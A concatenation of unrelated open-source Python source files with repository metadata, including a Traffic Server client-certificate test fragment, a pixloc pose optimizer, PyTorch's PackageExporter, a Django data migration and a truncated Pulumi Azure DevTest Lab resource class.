trfail.StillRunningAfter = ts
trfail.StillRunningAfter = server
trfail.StillRunningAfter = server2
trfail.Processes.Default.Command = 'curl -H host:example.com http://127.0.0.1:{0}/badcase1'.format(ts.Variables.port)
trfail.Processes.Default.ReturnCode = 0
trfail.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could Not Connect", "Check response")
# Should succeed
trbar = Test.AddTestRun("Connect with correct client cert to second server")
trbar.StillRunningAfter = ts
trbar.StillRunningAfter = server
trbar.StillRunningAfter = server2
trbar.Processes.Default.Command = "curl -H host:bar.com http://127.0.0.1:{0}/case2".format(ts.Variables.port)
trbar.Processes.Default.ReturnCode = 0
trbar.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Check response")
# Should fail
trbarfail = Test.AddTestRun("Connect with bad client cert to second server")
trbarfail.StillRunningAfter = ts
trbarfail.StillRunningAfter = server
trbarfail.StillRunningAfter = server2
trbarfail.Processes.Default.Command = 'curl -H host:bar.com http://127.0.0.1:{0}/badcase2'.format(ts.Variables.port)
trbarfail.Processes.Default.ReturnCode = 0
trbarfail.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could Not Connect", "Check response")
# Test the case of updating certificate contents without changing file name.
trupdate = Test.AddTestRun("Update client cert file in place")
trupdate.StillRunningAfter = ts
trupdate.StillRunningAfter = server
trupdate.StillRunningAfter = server2
# in the config/ssl directory for records.config
trupdate.Setup.CopyAs("ssl/signed-foo.pem", ".", "{0}/signed2-foo.pem".format(ts.Variables.SSLDir))
trupdate.Processes.Default.Command = 'traffic_ctl config set proxy.config.ssl.client.cert.path {0}/; touch {1}'.format(
shortdir, snipath)
# Need to copy over the environment so traffic_ctl knows where to find the unix domain socket
trupdate.Processes.Default.Env = ts.Env
trupdate.Processes.Default.ReturnCode = 0
tr2reload = Test.AddTestRun("Reload config")
tr2reload.StillRunningAfter = ts
tr2reload.StillRunningAfter = server
tr2reload.StillRunningAfter = server2
tr2reload.Processes.Default.Command = 'traffic_ctl config reload'
# Need to copy over the environment so traffic_ctl knows where to find the unix domain socket
tr2reload.Processes.Default.Env = ts.Env
tr2reload.Processes.Default.ReturnCode = 0
tr3bar = Test.AddTestRun("Make request with other foo. badcase1 should now work")
# Wait for the reload to complete
tr3bar.Processes.Default.StartBefore(server3, ready=When.FileContains(ts.Disk.diags_log.Name, 'sni.yaml finished loading', 3))
tr3bar.StillRunningAfter = ts
tr3bar.StillRunningAfter = server
tr3bar.StillRunningAfter = server2
tr3bar.Processes.Default.Command = 'curl -H host:foo.com http://127.0.0.1:{0}/badcase1'.format(ts.Variables.port)
tr3bar.Processes.Default.ReturnCode = 0
tr3bar.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Check response")
# Test the hot-reload feature. Update cert file and wait about. Should update without reload
trupdate = Test.AddTestRun("Update signed-foo cert file in place")
trupdate.StillRunningAfter = ts
trupdate.StillRunningAfter = server
trupdate.Setup.CopyAs("ssl/signed2-foo.pem", ".", "{0}/signed-foo.pem".format(ts.Variables.SSLDir))
# For some reason the Setup.CopyAs does not change the modification time, so we touch
trupdate.Processes.Default.Command = 'touch {0}/signed-foo.pem {0}/signed-foo.key'.format(ts.Variables.SSLDir)
# Need to copy over the environment so traffic_ctl knows where to find the unix domain socket
trupdate.Processes.Default.Env = ts.Env
trupdate.Processes.Default.ReturnCode = 0
# The plugin will pull every 3 seconds. So wait 4 seconds and test again.
# case1 should fail
# badcase1 should succeed
tr = Test.AddTestRun("Retest case1")
tr.DelayStart = 4
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = server2
tr.StillRunningAfter = ts
tr.Processes.Default.Command = "curl -H host:example.com http://127.0.0.1:{0}/case1".format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could Not Connect", "Check response")
tr = Test.AddTestRun("Retest badcase1")
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = server2
tr.StillRunningAfter = ts
tr.Processes.Default.Command = "curl -H host:example.com http://127.0.0.1:{0}/badcase1".format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Check response")
|
pixloc/pixlib/models/base_optimizer.py
|
jmorlana/pixloc
| 457 |
101183
|
<filename>pixloc/pixlib/models/base_optimizer.py
"""
Implements a simple differentiable optimizer based on Levenberg-Marquardt
with a constant, scalar damping factor and a fixed number of iterations.
"""
import logging
from typing import Tuple, Dict, Optional
import torch
from torch import Tensor
from .base_model import BaseModel
from .utils import masked_mean
from ..geometry import Camera, Pose
from ..geometry.optimization import optimizer_step
from ..geometry.interpolation import Interpolator
from ..geometry.costs import DirectAbsoluteCost
from ..geometry import losses # noqa
from ...utils.tools import torchify
logger = logging.getLogger(__name__)
class BaseOptimizer(BaseModel):
default_conf = dict(
num_iters=100,
loss_fn='squared_loss',
jacobi_scaling=False,
normalize_features=False,
lambda_=0, # Gauss-Newton
interpolation=dict(
mode='linear',
pad=4,
),
grad_stop_criteria=1e-4,
dt_stop_criteria=5e-3, # in meters
dR_stop_criteria=5e-2, # in degrees
# deprecated entries
sqrt_diag_damping=False,
bound_confidence=True,
no_conditions=True,
verbose=False,
)
logging_fn = None
def _init(self, conf):
self.loss_fn = eval('losses.' + conf.loss_fn)
self.interpolator = Interpolator(**conf.interpolation)
self.cost_fn = DirectAbsoluteCost(self.interpolator,
normalize=conf.normalize_features)
assert conf.lambda_ >= 0.
# deprecated entries
assert not conf.sqrt_diag_damping
assert conf.bound_confidence
assert conf.no_conditions
assert not conf.verbose
def log(self, **args):
if self.logging_fn is not None:
self.logging_fn(**args)
def early_stop(self, **args):
stop = False
if not self.training and (args['i'] % 10) == 0:
T_delta, grad = args['T_delta'], args['grad']
grad_norm = torch.norm(grad.detach(), dim=-1)
small_grad = grad_norm < self.conf.grad_stop_criteria
dR, dt = T_delta.magnitude()
small_step = ((dt < self.conf.dt_stop_criteria)
& (dR < self.conf.dR_stop_criteria))
if torch.all(small_step | small_grad):
stop = True
return stop
def J_scaling(self, J: Tensor, J_scaling: Tensor, valid: Tensor):
if J_scaling is None:
J_norm = torch.norm(J.detach(), p=2, dim=(-2))
J_norm = masked_mean(J_norm, valid[..., None], -2)
J_scaling = 1 / (1 + J_norm)
J = J * J_scaling[..., None, None, :]
return J, J_scaling
def build_system(self, J: Tensor, res: Tensor, weights: Tensor):
grad = torch.einsum('...ndi,...nd->...ni', J, res) # ... x N x 6
grad = weights[..., None] * grad
grad = grad.sum(-2) # ... x 6
Hess = torch.einsum('...ijk,...ijl->...ikl', J, J) # ... x N x 6 x 6
Hess = weights[..., None, None] * Hess
Hess = Hess.sum(-3) # ... x 6 x6
return grad, Hess
def _forward(self, data: Dict):
return self._run(
data['p3D'], data['F_ref'], data['F_q'], data['T_init'],
data['cam_q'], data['mask'], data.get('W_ref_q'))
@torchify
def run(self, *args, **kwargs):
return self._run(*args, **kwargs)
def _run(self, p3D: Tensor, F_ref: Tensor, F_query: Tensor,
T_init: Pose, camera: Camera, mask: Optional[Tensor] = None,
W_ref_query: Optional[Tuple[Tensor, Tensor]] = None):
T = T_init
J_scaling = None
if self.conf.normalize_features:
F_ref = torch.nn.functional.normalize(F_ref, dim=-1)
args = (camera, p3D, F_ref, F_query, W_ref_query)
failed = torch.full(T.shape, False, dtype=torch.bool, device=T.device)
for i in range(self.conf.num_iters):
res, valid, w_unc, _, J = self.cost_fn.residual_jacobian(T, *args)
if mask is not None:
valid &= mask
failed = failed | (valid.long().sum(-1) < 10) # too few points
# compute the cost and aggregate the weights
cost = (res**2).sum(-1)
cost, w_loss, _ = self.loss_fn(cost)
weights = w_loss * valid.float()
if w_unc is not None:
weights *= w_unc
if self.conf.jacobi_scaling:
J, J_scaling = self.J_scaling(J, J_scaling, valid)
# solve the linear system
g, H = self.build_system(J, res, weights)
delta = optimizer_step(g, H, self.conf.lambda_, mask=~failed)
if self.conf.jacobi_scaling:
delta = delta * J_scaling
# compute the pose update
dt, dw = delta.split([3, 3], dim=-1)
T_delta = Pose.from_aa(dw, dt)
T = T_delta @ T
self.log(i=i, T_init=T_init, T=T, T_delta=T_delta, cost=cost,
valid=valid, w_unc=w_unc, w_loss=w_loss, H=H, J=J)
if self.early_stop(i=i, T_delta=T_delta, grad=g, cost=cost):
break
if failed.any():
logger.debug('One batch element had too few valid points.')
return T, failed
def loss(self, pred, data):
raise NotImplementedError
def metrics(self, pred, data):
raise NotImplementedError
|
aztk/spark/models/plugins/jupyter/configuration.py
|
Geims83/aztk
| 161 |
101191
|
import os
from aztk.models.plugins.plugin_configuration import PluginConfiguration, PluginPort, PluginTargetRole
from aztk.models.plugins.plugin_file import PluginFile
dir_path = os.path.dirname(os.path.realpath(__file__))
def JupyterPlugin():
return PluginConfiguration(
name="jupyter",
ports=[PluginPort(internal=8888, public=True)],
target_role=PluginTargetRole.All,
execute="jupyter.sh",
files=[PluginFile("jupyter.sh", os.path.join(dir_path, "jupyter.sh"))],
)
|
packages/core/src/RPA/core/locators/literal.py
|
amisol/rpaframework
| 518 |
101206
|
<filename>packages/core/src/RPA/core/locators/literal.py
from typing import Union
from RPA.core.locators import LocatorsDatabase, Locator, TYPES
LocatorType = Union[str, Locator]
def _unquote(text):
if text.startswith('"') and text.endswith('"'):
text = text[1:-1]
return text
def parse(locator: LocatorType) -> Locator:
"""Parse locator string literal into a ``Locator`` instance.
For example: "image:path/to/image.png" -> ImageLocator(path="path/to/image-png")
"""
if isinstance(locator, Locator):
return locator
try:
typename, _, value = str(locator).partition(":")
except ValueError as err:
raise ValueError(f"Invalid locator format: {locator}") from err
if not value:
typename, value = "alias", typename
typename = typename.strip().lower()
if typename == "alias":
return LocatorsDatabase.load_by_name(_unquote(value))
else:
klass = TYPES.get(typename)
if not klass:
raise ValueError(f"Unknown locator type: {typename}")
args = [_unquote(arg) for arg in value.split(",")]
return klass(*args)
|
tock/projects/migrations/0026_auto_20200519_1616.py
|
elisoncrum/tock
| 134 |
101211
|
# Generated by Django 2.2.12 on 2020-05-19 20:16
from django.db import migrations
def populate_project_organizations(apps, schema_editor):
Project = apps.get_model('projects', 'Project')
Organization = apps.get_model('organizations', 'Organization')
# assignment of existing projects to orgs based on project name based on
# discussions w/ <NAME> (2020-05-20)
org_project_mapping = {
'18F': ['18F', 'TTS Acq'],
'CoE': ['CoE'],
'cloud.gov': ['cloud.gov'],
'Login.gov': ['Login.gov'],
'OA': ['TTS OA'],
'PIF': ['PIF']
}
for org_name in org_project_mapping.keys():
try:
org = Organization.objects.filter(name=org_name)[0]
for project_name_start in org_project_mapping[org_name]:
Project.objects.filter(name__istartswith=project_name_start).update(organization=org)
except IndexError:
pass
class Migration(migrations.Migration):
dependencies = [
('projects', '0025_auto_20200303_1821'),
('organizations', '0006_unit_initial_data')
]
operations = [
migrations.RunPython(populate_project_organizations),
]
|
api/src/opentrons/hardware_control/modules/lid_temp_status.py
|
anuwrag/opentrons
| 235 |
101221
|
<reponame>anuwrag/opentrons<gh_stars>100-1000
from opentrons.drivers.types import Temperature
from opentrons.hardware_control.modules.types import TemperatureStatus
class LidTemperatureStatus:
"""A wrapper for the lid temperature status."""
TEMP_THRESHOLD = 0.3
"""The threshold under which the difference between target and temperature
is considered `holding`."""
def __init__(self) -> None:
"""Construct."""
self._status = TemperatureStatus.ERROR
@property
def status(self) -> TemperatureStatus:
"""Return the current status."""
return self._status
def update(self, temperature: Temperature) -> TemperatureStatus:
"""Update the status based on the temperature."""
if temperature.target is None:
status = TemperatureStatus.IDLE
else:
diff = temperature.target - temperature.current
if abs(diff) < self.TEMP_THRESHOLD:
status = TemperatureStatus.HOLDING
elif diff < 0:
# TC lid can't actively cool
status = TemperatureStatus.IDLE
else:
status = TemperatureStatus.HEATING
self._status = status
return self._status
|
tests/helpers.py
|
achalpatel/thenewboston-python
| 122 |
101227
|
<reponame>achalpatel/thenewboston-python
from thenewboston.accounts.manage import create_account
from thenewboston.verify_keys.verify_key import encode_verify_key
def random_encoded_account_number():
signing_key, account_number = create_account()
return encode_verify_key(verify_key=account_number)
|
torch/_package/exporter.py
|
jsun94/nimble
| 206 |
101345
|
import torch
from torch.serialization import normalize_storage_type, location_tag, _should_read_directly
import io
import pickle
import pickletools
from .find_file_dependencies import find_files_source_depends_on
from ._custom_import_pickler import CustomImportPickler
from ._importlib import _normalize_path
import types
import importlib
from typing import List, Any, Callable, Dict, Tuple
from distutils.sysconfig import get_python_lib
from pathlib import Path
import linecache
import sys
from tempfile import NamedTemporaryFile
class PackageExporter:
""" Exporters allow you to write packages of code, pickled python data, and
arbitrary binary and text resources into a self-contained package.
Imports can load this code in a hermetic way, such that code is loaded
from the package rather than the normal python import system. This allows
for the packaging of PyTorch model code and data so that it can be run
on a server or used in the future for transfer learning.
The code contained in packages is copied file-by-file from the original
source when it is created, and the file format is a specially organized
zip file. Future users of the package can unzip the package, and edit the code
in order to perform custom modifications to it.
The importer for packages ensures that code in the module can only be loaded from
within the package, except for modules explicitly listed as external using :method:`extern_module`.
The file `extern_modules` in the zip archive lists all the modules that a package externally depends on.
This prevents "implicit" dependencies where the package runs locally because it is importing
a locally-installed package, but then fails when the package is copied to another machine.
Dependencies
------------
When source code is added to the package, the exporter optionally can scan it
for further code dependencies (`dependencies=True`). It looks for import statements,
resolves relative references to qualified module names, and calls :method:`require_module`
on each it finds, recursively resolving dependencies.
"""
importers: List[Callable[[str], Any]]
""" A list of functions that will be called in order to find the module assocated
with module names referenced by other modules or by pickled objects. Initialized to
`[importlib.import_module]` by default. When pickling code or objects that was loaded
from an imported packaged, that `importer.import_module` should be put into the importer list.
When a name conflict occurs between importers, the first importer in the list takes precedence,
and only objects that refer to this first importers class can be saved
"""
def __init__(self, filename: str, verbose: bool = True):
"""
Create an exporter.
Args:
filename: e.g. my_package.zip
verbose: Print information about dependency resolution to stdout.
Useful for tracking down why certain files get included.
"""
self.zip_file = torch._C.PyTorchFileWriter(filename)
self.serialized_storages : Dict[str, Any] = {}
self.external : List[str] = []
self.provided : Dict[str, bool] = {}
self.verbose = verbose
self.importers = [importlib.import_module]
self.debug_deps : List[Tuple[str, str]] = []
def save_source_file(self, module_name: str, file_or_directory: str, dependencies=True):
"""Adds the local file system `file_or_directory` to the source package to provide the code
for `module_name`.
Args:
module_name (str): e.g. `my_package.my_subpackage`, code will be saved to provide code for this package.
file_or_directory (str): the path to a file or directory of code. When a directory, all python files in the directory
are recursively copied using :meth:`save_source_file`. If a file is named "/__init__.py" the code is treated
as a package.
dependencies (bool, optional): If True, we scan the source for dependencies (see :ref:`Dependencies`).
"""
path = Path(file_or_directory)
if path.is_dir():
to_save = [] # list of tuples with arguments to save_source_string
module_path = module_name.replace('.', '/')
for filename in path.glob('**/*.py'):
relative_path = filename.relative_to(path).as_posix()
archivename = module_path + '/' + relative_path
if filename.is_dir():
self.provided[archivename] = True
else:
submodule_name = None
if filename.name == '__init__.py':
submodule_name = archivename[:-len('/__init__.py')].replace('/', '.')
is_package = True
else:
submodule_name = archivename[:-len('.py')].replace('/', '.')
is_package = False
self.provided[submodule_name] = True
# we delay the call to save_source_string so that we record all the source files
# being provided by this directory structure _before_ attempting to resolve the dependencies
# on the source. This makes sure we don't try to copy over modules that will just get
# overwritten by this directory blob
to_save.append((submodule_name, _read_file(str(filename)), is_package, dependencies, str(filename)))
for item in to_save:
self.save_source_string(*item)
else:
is_package = path.name == '__init__.py'
self.save_source_string(module_name, _read_file(file_or_directory), is_package, dependencies, file_or_directory)
def save_source_string(self, module_name: str, src: str, is_package: bool = False,
dependencies: bool = True, orig_file_name: str = None):
"""Adds `src` as the source code for `module_name` in the exported package.
Args:
module_name (str): e.g. `my_package.my_subpackage`, code will be saved to provide code for this package.
src (str): The python source code to save for this package
is_package (bool, optional): If True, this module is treated as a package. Packages are allowed to have submodules
(e.g. my_package.my_subpackage.my_subsubpackage), and resources can be saved inside them. Defaults to False.
dependencies (bool, optional): If True, we scan the source for dependencies (see :ref:`Dependencies`).
orig_file_name (str, optional): If present, used in logging to identifying where the source came from. Defaults to None.
"""
self.provided[module_name] = True
extension = '/__init__.py' if is_package else '.py'
filename = module_name.replace('.', '/') + extension
self._write(filename, src)
if dependencies:
package = module_name if is_package else module_name.rsplit('.', maxsplit=1)[0]
dep_pairs = find_files_source_depends_on(src, package)
dep_list = {}
for dep_module_name, dep_module_obj in dep_pairs:
# handle the case where someone did something like `from pack import sub`
# where `sub` is a submodule. In this case we don't have to save pack, just sub.
# this ensures we don't pick up additional dependencies on pack.
# However, in the case where `sub` is not a submodule but an object, then we do have
# to save pack.
if dep_module_obj is not None:
possible_submodule = f'{dep_module_name}.{dep_module_obj}'
if self._module_exists(possible_submodule):
dep_list[possible_submodule] = True
# we don't need to save `pack`
continue
if self._module_exists(dep_module_name):
dep_list[dep_module_name] = True
for dep in dep_list.keys():
self.debug_deps.append((module_name, dep))
if self.verbose:
dep_str = ''.join(f' {dep}\n' for dep in dep_list.keys())
file_info = f'(from file {orig_file_name}) ' if orig_file_name is not None else ''
print(f"{module_name} {file_info}depends on:\n{dep_str}\n")
for dep in dep_list.keys():
self.require_module_if_not_provided(dep)
def _module_exists(self, module_name: str) -> bool:
try:
self._import_module(module_name)
return True
except Exception:
return False
def _write_dep_graph(self, failing_module=None, output_file=None):
depended_on : Dict[str, List[str]] = {}
for f, t in self.debug_deps:
if t not in depended_on:
depended_on[t] = []
if f not in depended_on:
depended_on[f] = []
depended_on[t].append(f)
level : Dict[str, int] = {}
def visit(x: str):
if x in level:
return level[x]
level[x] = 0
for e in depended_on[x]:
level[x] = max(level[x], visit(e) + 1)
return level[x]
for x in depended_on.keys():
visit(x)
nodes = []
node_to_id = {}
n = 0
for ft in self.debug_deps:
for e in ft:
if e not in node_to_id:
node_to_id[e] = n
extra = ''
if e == failing_module:
extra = ", color: 'red'"
nodes.append(f" {{id: {n}, label: '{e}', level: {level[e]}, shape: 'box'{extra}}},\n")
n += 1
edges = []
for f, t in self.debug_deps:
fn, tn = node_to_id[f], node_to_id[t]
edges.append(f" {{from: {fn}, to: {tn}, arrows: 'to'}},\n")
nodes_s, edges_s = ''.join(nodes), ''.join(edges)
template = f"""\
<html>
<head>
<script type="text/javascript" src="https://almende.github.io/vis/dist/vis.js"></script>
<link href="https://almende.github.io/vis/dist/vis.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="mynetwork"></div>
<script type="text/javascript">
var nodes = new vis.DataSet([
{nodes_s}
]);
var edges = new vis.DataSet([
{edges_s}
]);
var options = {{
layout: {{
hierarchical: {{
direction: "LR",
levelSeparation: 400,
}},
}},
}};
// create a network
var container = document.getElementById('mynetwork');
var network = new vis.Network(container, {{nodes: nodes, edges: edges}}, options);
</script>
</body>
</html>
"""
if output_file:
output_file.write(template)
return None
with NamedTemporaryFile(mode='w', suffix='.html', delete=False) as tf:
tf.write(template)
return tf.name
def _get_source_of_module(self, module: types.ModuleType) -> str:
filename = getattr(module, '__file__', None)
result = None if filename is None or not filename.endswith('.py') else linecache.getlines(filename, module.__dict__)
if result is None:
extra = ''
if self.verbose:
extra = f' See the dependency graph for more info: {self._write_dep_graph(module.__name__)}'
raise ValueError(f'cannot save source for module "{module.__name__}" because '
f'its source file "{filename}" could not be found.{extra}')
return ''.join(result)
def require_module_if_not_provided(self, module_name: str, dependencies=True):
if self._module_is_already_provided(module_name):
return
self.require_module(module_name, dependencies)
def require_module(self, module_name: str, dependencies=True):
"""This is called by dependencies resolution when it finds that something in the package
depends on the module and it is not already present. It then decides how to provide that module.
The default resolution rules will mark the module as extern if it is part of the standard library,
and call `save_module` otherwise. Clients can subclass this object
and override this method to provide other behavior, such as automatically mocking out a whole class
of modules"""
root_name = module_name.split('.', maxsplit=1)[0]
if self._can_implicitly_extern(root_name):
if self.verbose:
print(f'implicitly adding {root_name} to external modules '
f'since it is part of the standard library and is a dependency.')
self.extern_module(root_name)
return
self.save_module(module_name, dependencies)
def save_module(self, module_name: str, dependencies=True):
"""Save the code for `module_name` into the package. Code for the module is resolved using the `importers` path to find the
module object, and then using its `__file__` attribute to find the source code.
Args:
module_name (str): e.g. `my_package.my_subpackage`, code will be saved to provide code for this package.
dependencies (bool, optional): If True, we scan the source for dependencies (see :ref:`Dependencies`).
"""
module = self._import_module(module_name)
source = self._get_source_of_module(module)
self.save_source_string(module_name, source, hasattr(module, '__path__'), dependencies, module.__file__)
def _import_module(self, module_name):
last_err = None
for import_module in self.importers:
try:
return import_module(module_name)
except ModuleNotFoundError as err:
last_err = err
if last_err is not None:
raise last_err
else:
raise ModuleNotFoundError(module_name)
def _create_pickler(self, data_buf):
if self.importers == [importlib.import_module]:
# if we are using the normal import library system, then
# we can use the C implementation of pickle which is faster
return pickle.Pickler(data_buf, protocol=3)
else:
return CustomImportPickler(self._import_module, data_buf, protocol=3)
def save_pickle(self, package: str, resource: str, obj: Any, dependencies: bool = True):
"""Save a python object to the archive using pickle. Equivalent to :func:`torch.save` but saving into
the archive rather than a stand-alone file. Stanard pickle does not save the code, only the objects.
If `dependencies` is true, this method will also scan the pickled objects for which modules are required
to reconstruct them and save the relevant code.
To be able to save an object where `type(obj).__name__` is `my_module.MyObject`,
`my_module.MyObject` must resolve to the class of the object according to the `importer` order. When saving objects that
have previously been packaged, the importer's `import_module` method will need to be present in the `importer` list
for this to work.
Args:
package (str): The name of module package this resource should go it (e.g. "my_package.my_subpackage")
resource (str): A unique name for the resource, used to indentify it to load.
obj (Any): The object to save, must be picklable.
dependencies (bool, optional): If True, we scan the source for dependencies (see :ref:`Dependencies`).
"""
filename = self._filename(package, resource)
# Write the pickle data for `obj`
data_buf = io.BytesIO()
pickler = self._create_pickler(data_buf)
pickler.persistent_id = self._persistent_id
pickler.dump(obj)
data_value = data_buf.getvalue()
if dependencies:
all_dependencies = []
for opcode, arg, pos in pickletools.genops(data_value):
if opcode.name == 'GLOBAL': # a global reference
assert isinstance(arg, str)
module, field = arg.split(' ')
if module not in all_dependencies:
all_dependencies.append(module)
for dep in all_dependencies:
self.debug_deps.append((package + '.' + resource, dep))
if self.verbose:
dep_string = ''.join(f' {dep}\n' for dep in all_dependencies)
print(f"{resource} depends on:\n{dep_string}\n")
for module_name in all_dependencies:
self.require_module_if_not_provided(module_name)
self._write(filename, data_value)
def save_text(self, package: str, resource: str, text: str):
"""Save text data to the package
Args:
package (str): The name of module package this resource should go it (e.g. "my_package.my_subpackage")
resource (str): A unique name for the resource, used to indentify it to load.
text (str): The contents to save
"""
return self.save_binary(package, resource, text.encode('utf-8'))
def save_binary(self, package, resource, binary: bytes):
"""Save raw bytes to the package.
Args:
package (str): The name of module package this resource should go it (e.g. "my_package.my_subpackage")
resource (str): A unique name for the resource, used to indentify it to load.
binary (str): The data to save.
"""
filename = self._filename(package, resource)
self._write(filename, binary)
def extern_module(self, module_name: str):
"""Include `module` in the list of external modules the package can import.
This will prevent dependency discover from saving
it in the package. The importer will load an external module directly from the standard import system.
Code for extern modules must also exist in the process loading the package.
Args:
module_name (str): e.g. "my_package.my_subpackage" the name of the external module
"""
if module_name not in self.external:
self.external.append(module_name)
def extern_modules(self, module_names: List[str]):
"""Extern a list of modules. Convience wrapper for calling :meth:`extern_module` on many items.
Args:
module_names (List[str]): List of module names
"""
for m in module_names:
self.extern_module(m)
def mock_module(self, module_name: str):
"""Replace the code for `module_name` in the package with a fake implementation. This module will return a fake
object for any attribute accessed from it. Because we copy file-by-file, the dependency resolution will sometimes
find files that are imported by model files but whose functionality is never used
(e.g. custom serialization code or training helpers).
Use this function to mock this functionality out without having to modify the original code.
Args:
module_name (str): e.g. "my_package.my_subpackage" the name of the module to be mocked out.
"""
if '_mock' not in self.provided:
self.save_source_file('_mock', str(Path(__file__).parent / '_mock.py'), dependencies=False)
is_package = hasattr(self._import_module(module_name), '__path__')
self.save_source_string(module_name, _MOCK_IMPL, is_package, dependencies=False)
def mock_modules(self, module_names):
"""Mock a list of modules. Convience wrapper for calling :meth:`mock_module` on many items.
Args:
module_names (List[str]): List of module names
"""
for module_name in module_names:
self.mock_module(module_name)
def _module_is_already_provided(self, qualified_name: str) -> bool:
for mod in self.external:
if qualified_name == mod or qualified_name.startswith(mod + '.'):
return True
return qualified_name in self.provided
def _persistent_id(self, obj):
# FIXME: the docs say that persistent_id should only return a string
# but torch store returns tuples. This works only in the binary protocol
# see
# https://docs.python.org/2/library/pickle.html#pickling-and-unpickling-external-objects
# https://github.com/python/cpython/blob/master/Lib/pickle.py#L527-L537
if torch.is_storage(obj):
storage_type = normalize_storage_type(type(obj))
obj_key = str(obj._cdata)
location = location_tag(obj)
self.serialized_storages[obj_key] = obj
return ('storage',
storage_type,
obj_key,
location,
obj.size())
return None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def _write(self, filename, str_or_bytes):
if isinstance(str_or_bytes, str):
str_or_bytes = str_or_bytes.encode('utf-8')
self.zip_file.write_record(filename, str_or_bytes, len(str_or_bytes))
def close(self):
"""Write the package to the filesystem. Any calls after close are now invalid.
It is preferable to use resource guard syntax instead:
with PackageExporter("file.zip") as e:
...
"""
if self.verbose:
print(f"Dependency graph for exported package: {self._write_dep_graph()}")
# Write each tensor to a file named tensor/the_tensor_key in the zip archive
for key in sorted(self.serialized_storages.keys()):
name = 'data/{}'.format(key)
storage = self.serialized_storages[key]
if storage.device.type == 'cpu':
# If it's on the CPU we can directly copy it into the zip file
num_bytes = storage.size() * storage.element_size()
self.zip_file.write_record(name, storage.data_ptr(), num_bytes)
else:
# Copy to a buffer, then serialize that
buf = io.BytesIO()
storage._write_file(buf, _should_read_directly(buf))
buf_value = buf.getvalue()
self._write(name, buf_value)
contents = ('\n'.join(self.external) + '\n')
self._write('extern_modules', contents)
del self.zip_file
def _filename(self, package, resource):
package_path = package.replace('.', '/')
resource = _normalize_path(resource)
return f'{package_path}/{resource}'
def _can_implicitly_extern(self, module_name: str):
return module_name == 'torch' or (module_name not in _DISALLOWED_MODULES
and _is_builtin_or_stdlib_module(self._import_module(module_name)))
# even though these are in the standard library, we do not allow them to be
# automatically externed since they offer a lot of system level access
_DISALLOWED_MODULES = ['sys', 'io']
def _is_builtin_or_stdlib_module(module: types.ModuleType) -> bool:
if module.__name__ in sys.builtin_module_names:
return True
filename = getattr(module, '__file__', None)
if filename is None:
return False
standard_lib = get_python_lib(standard_lib=True)
# this is often a subdirectory of standard_lib so we have to check
# that the file is in the standard_lib directory but not in this one
installed_libs = get_python_lib(standard_lib=False)
in_standard_lib = filename.startswith(standard_lib + '/')
in_installed_libs = filename.startswith(installed_libs + '/')
return in_standard_lib and not in_installed_libs
_MOCK_IMPL = """\
from _mock import MockedObject
def __getattr__(attr: str):
return MockedObject(__name__ + '.' + attr)
"""
def _read_file(filename: str) -> str:
with open(filename, 'rb') as f:
b = f.read()
return b.decode('utf-8')
|
sdk/python/pulumi_azure/devtest/lab.py
|
henriktao/pulumi-azure
| 109 |
101361
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['LabArgs', 'Lab']
@pulumi.input_type
class LabArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Lab resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_type: The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if storage_type is not None:
pulumi.set(__self__, "storage_type", storage_type)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="storageType")
def storage_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_type")
@storage_type.setter
def storage_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_type", value)
@property
@pulumi.getter
